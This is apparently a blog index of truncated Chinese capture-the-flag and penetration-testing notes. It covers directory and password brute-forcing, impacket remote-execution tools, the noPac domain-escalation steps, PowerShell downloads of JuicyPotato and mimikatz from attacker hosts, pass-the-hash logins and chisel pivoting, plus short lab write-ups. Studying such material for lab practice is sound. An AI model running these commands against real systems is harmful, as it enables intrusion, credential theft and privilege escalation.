tip
目录 gobuster dir --url http://www.onlineshop.thm/ -w /usr/share/wordlists/dirbuster/directory-list.txt gobuster dir -u 10.10.1.48/cgi-bin/ -w /Users/dionysus/CTF/tools/wordlists/dirb/common.txt -x sh,cgi带上后面的参数指定目录 ffuf -w /usr/share/wordlists/wfuzz/general/common.txt -u http://10.10.244.229/FUZZ 爆破密码 hydra -l admin -P /usr/share/wordlists/rockyou.txt 10.10.18.74 http-post-form "/admin:user=^USER^&pass=^PASS^:F=invalid" -V su 爆破脚本加加 #!/bin/bashset -m #enable job controlexport TOP_PI ...
impacket
cv保存一下 类型 脚本名 脚本介绍 远程执行 psexec.py 使用了RemComSvc的实现了PSEXEC功能的脚本。 远程执行 smbexec.py 类似PSECEX的执行方式,但未使用RemComSvc。这个脚本使用了一个本地SMB Server接收返回的结果,可以避免目标SMB没有可写的目录 远程执行 atexec.py 这个脚本通过MS-TSCH协议控制计划任务在目标机器上执行命令并获得回显 远程执行 wmiexec.py 通过WMI实现了半交互式的Shell,不需要在目标安装任何服务或软件。而且高度隐蔽的以管理员权限运行 远程执行 dcomexec.py 类似wmiexec.py的半交互式Shell,但是使用了DCOM接口,目前支持的接口有MMC20.Application、ShellWindows、ShellBrowserWindows Kerberos协议 GetTGT.py 提供密码、hash或aeskey用来请求TGT并且保存为ccache格式 Kerberos协议 GetST.py 提供密码、hash、aeskey或cca ...
tricks
Nopac CVE-2021-42278,机器账户的名字一般来说应该以$结尾,但AD没有对域内机器账户名做验证。 CVE-2021-42287,与上述漏洞配合使用,创建与DC机器账户名字相同的机器账户(不以$结尾),账户请求一个TGT后,更名账户,然后通过S4U2self申请TGS Ticket,接着DC在TGS_REP阶段,这个账户不存在的时候,DC会使用自己的密钥加密TGS Ticket,提供一个属于该账户的PAC,然后我们就得到了一个高权限ST。 假如域内有一台域控名为 DC(域控对应的机器用户为 DC$),此时攻击者利用漏洞 CVE-2021-42287 创建一个机器用户 SAMTHEADMIN-48$,再把机器用户 SAMTHEADMIN-48$ 的 sAMAccountName 改成 DC。然后利用 DC 去申请一个TGT票据。再把 DC 的sAMAccountName 改为 SAMTHEADMIN-48$。这个时候 KDC 就会判断域内没有DC这个用户,自动去搜索 DC$(DC$是域内已经的域控DC 的 sAMAccountName),攻击者利用刚刚申请的 TGT 进行 ...
windows
PowerShell下载文件 Invoke-WebRequest http://10.17.6.173:8000/JuicyPotato.exe -outfile a.exe 利用JuicyPotato.exe提权 https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe .\a.exe -t * -p "C:\Windows\System32\cmd.exe" -l 1337 -a "/c type C:\Users\Administrator\Desktop\root.txt.txt > C:\temp\output.txt" SweetPotato .\b.exe -a "whoami" 下载文件 1.powershell.exe -ExecutionPolicy BypassInvoke-WebRequest 'http://10.50.77.108/mimikatz.zip' -OutFile .\ ...
常用脚本
Evil-winrm winrm 服务端口 5895 和 5896 是否打开 一般开了就能用 纯文本密码登录 evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 使用 NTLM Hash evil-winrm -i 192.168.1.19 -u administrator -H 32196B56FFE6F45E294117B91A83BF38 上传下载文件 upload xxxdownload xxx wmiexec 目标主机开放135和445端口 python wmiexec.py administrator:123.com@192.168.52.140python wmiexec.py administrator@192.168.52.140 -hashes Lm哈希:NTLM哈希 psexec 基于IPC共享,所以要目标打开445端口
SSH
再说
chisel
单独开一个代理模块 正向代理 被害机 ./chisel server -p 1234 攻击机 chisel client -v 被害机IP:1234 3000:被害机内网IP:80 访问localhost:3000就是内网服务了 反向代理 相当于中间人了 公网机 ./chisel server -p 7000 --reverse 被害机 ./chisel client 公网IP:7000 R:0.0.0.0:7777:socks 代理是公网IP的7777端口 二层代理 第一级,外网机器的其他端口和第一层内网的80端口 本地 ==> 第一层外网 => 第一层内网 => 第二层内网 VPS DMZ 办公区 核心区 第二级 可以直接打80了 VPS ./chisel server -p 7000 --reverse 第一层外网 ./chisel client VPS:7000 R:0.0.0.0:7777:socks 此时通过VPS:7777代理可以访问第一层内网的服务 打穿第一层内网后 第一层外网 . ...
Snort
额,不是我想的那个啊,不做了
Basic Malware RE 逆向
第一个直接反编译就能看到 第二个 local_2c = 'F';local_2b = 0x4c;local_2a = 0x41;local_29 = 0x47;local_28 = 0x7b;local_27 = 0x53;local_26 = 0x54;local_25 = 0x41;local_24 = 0x43;local_23 = 0x4b;local_22 = 0x2d;local_21 = 0x53;local_20 = 0x54;local_1f = 0x52;local_1e = 0x49;local_1d = 0x4e;local_1c = 0x47;local_1b = 0x53;local_1a = 0x2d;local_19 = 0x41;local_18 = 0x52;local_17 = 0x45;local_16 = 0x2d;local_15 = 0x42;local_14 = 0x45;local_13 = 0x53;local_12 = 0x54;local_11 = 0x2d;local_10 = 0x53;local_f = ...
Anonforce ftp gpg解密,爆破shadow
ftp直接拿user.txt gpg2john private.asc > hashcat hash anonforce:$gpg$*17*54*2048*e419ac715ed55197122fd0acc6477832266db83b63a3f0d16b7f5fb3db2b93a6a995013bb1e7aff697e782d505891ee260e957136577*3*254*2*9*16*5d044d82578ecc62baaa15c1bcf1cfdd*65536*d7d11d9bf6d08968:::anonforce <melodias@anonforce.nsa>::private.ascjohn --wordlist=/usr/share/wordlists/rockyou.txt hashgpg --import private.asc//导入gpg --decrypt backup.pgp 输入破解得到的密码 得到shadow文件 unshadow passwd shadow.txt > unshadowed.txt 来爆破joh ...
Break it 密码 cyber
base32 MVQXG6K7MJQXGZJTGI====== TVJYWEtZVE1NVlBXRVlMVE1WWlE9PT09 一堆
CMesS 子域名爆破,tar,定时任务,gila
searchexploit,然后就是获取邮箱密码 ffuf爆破子域名 在子域名中发现目标数据 脚本嗦完后opt发现密码备份 ssh登录后发现定时脚本,tar gtf一把嗦 touch一下这两个文件 tmp下等bash bash -p root
avatar
dionysus
我醉欲眠卿且去
此心安处
公告